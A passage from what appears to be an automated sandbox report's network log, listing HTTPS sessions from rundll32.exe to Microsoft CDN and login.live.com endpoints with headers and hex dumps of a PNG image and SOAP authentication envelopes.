                                                                                                                                                                                    Data Ascii: jD1yq'+YN'G/q({)}NXMiTUca5aa#+;U)X@cB1=4Oc|(3bdeSM\n"X^\h8+*&lekqc-C`IY}Z|ZnkxVKwV1r%c
                                                                                                                                                                                    2023-01-05 07:56:52 UTC82INData Raw: 6f 77 f1 cf c2 d1 f5 35 ae fb 7d c5 f0 f7 32 9d c8 50 1c 60 38 06 80 a1 cf 19 3e 2e 02 f6 a9 cb c1 65 fb 04 11 2e 14 f9 90 70 21 c2 f5 3e e0 7a cf eb 10 f0 7a 17 bd 03 bc 08 d7 5b 84 cb e2 f5 06 a7 2d f4 3a 22 5c 07 00 d7 ab 8c 68 61 da 7a 19 e9 f6 d0 a2 b5 0f 3d 0f b0 f6 72 8b 88 e3 33 3e 5a 38 3e 81 23 d1 7a d4 f6 30 e0 02 5a ba 3d dc 85 6d e2 4e b4 1d d3 d6 56 c0 b5 05 59 b4 0a 03 b4 da 49 c1 6a b4 0a 60 ad 04 56 3a 69 b5 95 fc 34 60 c5 29 6b 51 5b c9 9b df 46 72 e7 02 ac d9 68 26 b0 9a 81 a6 e1 b6 29 04 0b 8d 07 54 e3 d0 68 34 12 58 11 ac 61 6d 25 73 08 1a 68 c0 ca e8 0b ac fa b4 93 6b 98 b2 ae f5 20 5a 00 ab 9b 03 cb 9e c7 ea d8 5d ae 60 ca ba d2 be 97 be bc e1 12 b6 85 97 5a f7 55 b0 f8 f2 06 1f ac 0b 04 0b 53 56 18 2c 9d b0 08 16 b6 85 0a 56 4d 4e
                                                                                                                                                                                    Data Ascii: ow5}2P`8>.e.p!>zz[-:"\haz=r3>Z8>#z0Z=mNVYIj`V:i4`)kQ[Frh&)Th4Xam%shk Z]`ZUSV,VMN


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    1192.168.2.44969780.67.82.235443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:56:52 UTC0OUTGET /cms/api/am/imageFileData/RE55wxd?ver=c28e HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:56:52 UTC34INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE55wxd?ver=c28e
                                                                                                                                                                                    Last-Modified: Wed, 23 Nov 2022 05:26:45 GMT
                                                                                                                                                                                    X-Source-Length: 16443
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: 7516457a-d412-4e4d-b1fc-f3b58bf9fb38
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Length: 16443
                                                                                                                                                                                    Cache-Control: public, max-age=207183
                                                                                                                                                                                    Expires: Sat, 07 Jan 2023 17:29:55 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:56:52 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:56:52 UTC34INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 06 00 00 00 79 7d 8e 75 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 3f d0 49 44 41 54 78 01 ed 9d 7f ac 1d c7 75 df cf ee 7d ef f1 91 7c 7c a4 28 52 b4 24 ca a6 15 b5 26 a9 b8 4d a2 98 ca 0f a7 91 12 bb 29 52 d4 68 d3 ca ff 04 fd 89 fc 51 b4 41 80 a2 ed 1f 35 02 c8 2e 1a 14 08 92 a2 29 da 7f 9a 16 48 d1 1a 29 e2 a0 69 91 3a 01 1c 39 51 d2 b4 89 9d 28 71 9c 50 91 6d 39 a1 2c 4a 14 45 8a e4 e3 8f c7 1f ef dd 3b 3d 67 ee 39 b3 67 66 67 ef 63 53 df 4b db f9 7e 88 e5 fe 9a 9d 9d dd fb e6 bb e7 9c 99 9d 25 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: PNGIHDR,,y}upHYssRGBgAMAa?IDATxu}||(R$&M)RhQA5.)H)i:9Q(qPm9,JE;=g9gfgcSK~%
                                                                                                                                                                                    2023-01-05 07:56:52 UTC50INData Raw: 5d 6e 5a a5 dc 32 4b fb d4 82 58 ad a4 5f f5 fb 0a 8b 23 a5 2b d6 53 9e 95 ed ab c5 39 d3 dc f2 ae 4c a9 0c ae 2c fe 5a fc b9 ca b4 b3 a6 15 37 4f 13 3f 0c cc 92 5d a6 dc c2 1d d9 ef 20 93 6b 49 85 65 05 00 a9 68 55 2a 46 7a d7 d0 89 d7 c8 bb 2b 34 ad 6c de 8d 4c 93 56 c8 25 97 66 49 b6 15 15 d5 a7 bd eb c9 d2 bb 73 a4 32 68 f9 e2 b2 08 6b e5 9c 71 9b 4f e7 f3 95 49 8e d3 fd 2b 96 a7 a5 af 5c d7 b2 3b c7 4a 91 ef 52 39 e9 7d b3 fc d2 7d 75 ae 5f 7c 78 98 60 e9 76 08 15 00 8e e4 06 7a e1 2a 44 2c 55 28 a9 44 5e c4 c8 c5 c1 6c bb 9f cb 54 56 50 7f bc a5 b1 65 ad a4 bd bc 6d d9 d2 16 e9 b2 75 4d d3 b3 16 7d fa b2 1c b3 b6 d5 ce 51 4b 5b 39 d6 0f 98 58 4e 8d 09 d2 8c fb 0e b1 02 60 16 ae 15 aa 56 79 32 11 d3 b4 c9 75 31 17 73 e0 b8 f6 2e f2 9c 55 71 7d 5f b1
                                                                                                                                                                                    Data Ascii: ]nZ2KX_#+S9L,Z7O?] kIehU*Fz+4lLV%fIs2hkqOI+\;JR9}}u_|x`vz*D,U(D^lTVPemuM}QK[9XN`Vy2u1s.Uq}_


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    10192.168.2.44970520.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:04 UTC182OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4740
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:04 UTC183OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:05 UTC195INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:05 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: a51ba6ee-6fec-4dbd-8a2c-7e9e659b430b
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02EPF0000676A V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:04 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11296
                                                                                                                                                                                    2023-01-05 07:57:05 UTC195INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    11192.168.2.44970620.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:04 UTC187OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4740
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:04 UTC188OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:05 UTC192INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:05 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: e3be9494-0f2b-43c4-a70d-9cccc3f0095e
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PF60AA72366 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:05 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 1962
                                                                                                                                                                                    2023-01-05 07:57:05 UTC193INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    12192.168.2.44970720.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:05 UTC206OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4740
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:05 UTC207OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:05 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:05 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: 843caab7-04a2-4cfd-82cd-1e295097141b
                                                                                                                                                                                    PPServer: PPV: 30 H: BL6PPF202D4D13F V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:05 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11296
                                                                                                                                                                                    2023-01-05 07:57:05 UTC212INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    13192.168.2.44970820.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:05 UTC223OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4740
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:05 UTC223OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:06 UTC228INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:06 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: dd5767a3-90f4-46c6-a95d-f09ee25a6097
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PF2434F9C50 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:05 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11296
                                                                                                                                                                                    2023-01-05 07:57:06 UTC229INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    14192.168.2.44970920.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:06 UTC240OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4740
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:06 UTC240OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
